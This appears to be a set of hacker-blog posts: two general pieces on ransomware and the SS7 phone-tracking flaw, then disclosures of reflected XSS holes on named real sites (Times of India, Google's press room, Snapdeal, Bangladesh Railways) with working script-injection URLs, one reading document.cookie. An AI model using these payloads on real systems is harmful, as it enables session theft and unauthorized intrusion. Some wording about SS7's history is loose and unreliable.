Ransomware and the threat to Business

The higher the security becomes, the threats become more harmful. This is significantly true in the computer world where there are new vulnerabilities discovered every now and then. One of the most daunting threats in the past few years is Ransomware. It is a growing threat for many businesses as well as computer users.

Each month, you will hear about several ransomware attacks that take place and millions of dollars are made by those online criminals. Usually ransomware attacks are done through poisoned email attachments as well as malicious website ads. If you don�t have a good Internet security antivirus, it would be very difficult to prevent and be immune to these malicious attacks.

One of the best security companies in the world Bitdefender had predicted that such ransomware attacks will soon spread to Operating systems other than Windows and Android. This prediction is largely turning out to be true.

A major security firm Tripwire recently shared that an extremely small number of businesses believe that they can completely recover from a ransomware attack. This is generally very true because the nature of such attacks is difficult to decipher and it can prove to be harmful for the business.

A recent survey was conducted for 200 security professionals who attended the RSA 2016 conference. Through this survey, it was concluded that around 38% businesses are very confident about recovering from a harmful ransomware attack. 49% of people were doubtful over the recovery of the important data and 13% fully admitted that they were not at all confident on the recovery of data. This is certainly a worrying statistic.

These statistics indicate that companies are not using the best practices to avoid a ransomware attack. If they try to tighten their security, it would be difficult for ransomware attackers to attack their systems. Most of the businesses fear and just pay up the extortionists when they can actually recover their data from a safe back. This is one of the things major businesses are lacking and it is high time to implement the right security measures.

Any business would not want their hard earned money go into the hands of criminals who have erased all the company�s data and are seeking ransom to give it back. If you don�t want to be a victim of ransomware attacks happening these days, you can simply take secure, easy-to-store backups frequently. This will ensure that even if you lose the data, you can recover it with ease.

All phones prone to a Global cellular network vulnerability

Almost everyone in the current world uses a phone, as it is a technological device it stands a chance of being exposed to vulnerabilities. We have seen recent threats to some of the most popular operating systems including security loopholes in Android and iOS. But the devices of these operating systems are in a limited people�s hands. The biggest threat that can arise is when there is a threat to the whole global cellular network. It includes every single phone that is running on a network.

It has been found by some of the most prolific security researchers that a vulnerability in the Signaling System Seven (SS7) has been exploited to track location, see messages and phone calls on any type of smart phone in the planet. This is one of the biggest potential threats that has found its way through phones. Through this vulnerability, anyone sitting from anywhere can track a phone without the consent of the person who is the owner of the device. It is certainly very risky and can put a lot of people in trouble.

A German hacker named Karsten Nohl demonstrated very efficiently on how he leveraged this loophole to track the personal details of the iPhone which is owned by US Congressman Ted Lieu. This hack proved that no smart phone is safe and a hacker with proficiency can easily attack any phone device he wants.
To this tracking scene, Ted Lieu gave a comment on national television that said, �First, it�s really creepy, and second, it makes me angry�

The major problem that has occurred is in the SS7 or the Signaling System Number 7. It is the only telephony signaling protocol that is widely used by more than 800 operators throughout the world. This protocol is used to exchange information with one another and other major features include cross carrier billing and enabling roaming. This means that almost all the phones use this protocol to get even the simplest things done.
Even if one of the telecom operators is hacked, it means everyone who is using the service is exposed to the vulnerability. This also lets the hacker access all the information on a large scale including all the phone calls, text messages, billing information, relaying meta data and subscribers data.

According to major reports these vulnerabilities have been existing in the SS7 since the 2014 roll out. This is quite a serious problem which should have been addressed till now but experts are working on it.
Ted Lieu further stated that, �The people who knew about this flaw [or flaws] should be fired, you can�t have 300-some Million Americans�and really, right, the global citizenry � be at risk of having their phone conversations intercepted with a known flaw, simply because some intelligence agencies might get some data.�

The only way to be safe of this loophole is to encrypt all your data before it leaves your smart phone.

WWE.com XSS Vulnerability

Times of India vulnerable to XSS(reflected)

Affected url:  http://timesofindia.indiatimes.com/searchresult.cms?sortorder=score&searchtype=2&maxrow=10&startdate=2001-01-01&enddate=2015-06-01&article=2&pagenumber=1&isphrase=no&query=%3E%3C/title%3E%3C/style%3E%3C/scRipt%20%3E%3CscRipt%3Ealert%28%27TestedbyAnshuman%27%29%3C/scRipt%3E&searchfield=&section=&kdaterange=30&date1mm=01&date1dd=01&date1yyyy=2001&date2mm=06&date2dd=01&date2yyyy=2015



Regards: GD 4TT4CK3R 

Google�s Multimedia Press Room Vulnerable to XSS

http://googlemultimedia.synapticdigital.com/HOME/AssetSearch/http%3a%2f%2ftarget.com%2fsearch.php%3fsearch%3d%22%3E%3Cscript%3Ealert%28%22TestedByAnshuman%22%29%3C%2fscript%3E/Videos  

Regards: GD 4TT4CK3R

Snapdeal is vulnerable to Xss(Reflected)

 Snapdeal.com is an online marketplace, headquartered in New Delhi, India. The company was started by Kunal Bahl, a Whartongraduate as part of the dual degree M&T Engineering and Business program at Penn, and Rohit Bansal, an alumnus of IIT Delhi in February 2010.Snapdeal.com was started in February 2010 as a daily deals platform but expanded in September 2011 to become an e-commerce company via a marketplace model. With 20 million registered users, Snapdeal is one of the first and largest online marketplaces in India offering an assortment of 4 million+ products across diverse categories from over 20,000 sellers, shipping to 4,000 towns and cities in India.

Further on testing i found Xss vulnerability in m.snapdeal.com 

Affected Url:

1.> http://m.snapdeal.com/search?keyword=%3Cscript%3Ealert%28%27Tested+by+Anshuman%27%29%3B%3C%2Fscript%3E&categoryId=&catId=&suggested=false&vertical=&clickSrc=&lastKeyword=&prodCatId=&changeBackToAll=false&foundInAll=false&categoryIdSearched=   (open with Firefox)

Regards: gd 4TT4CK3R !!!!

Bangladesh Railways is vulnerable to XSS

Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted web sites. XSS attacks occur when an attacker uses, a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it.An attacker can use XSS to send a malicious script to an unsuspecting user. The end user�s browser has no way to know that the script should not be trusted, and will execute the script. Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used by that site.

http://www.railway.gov.bd/admin.asp?msg=<script>alert('test');</script>

http://www.railway.gov.bd/admin.asp?msg=<script>alert(document.cookie);</script>

Regards: GD 4TT4CK3R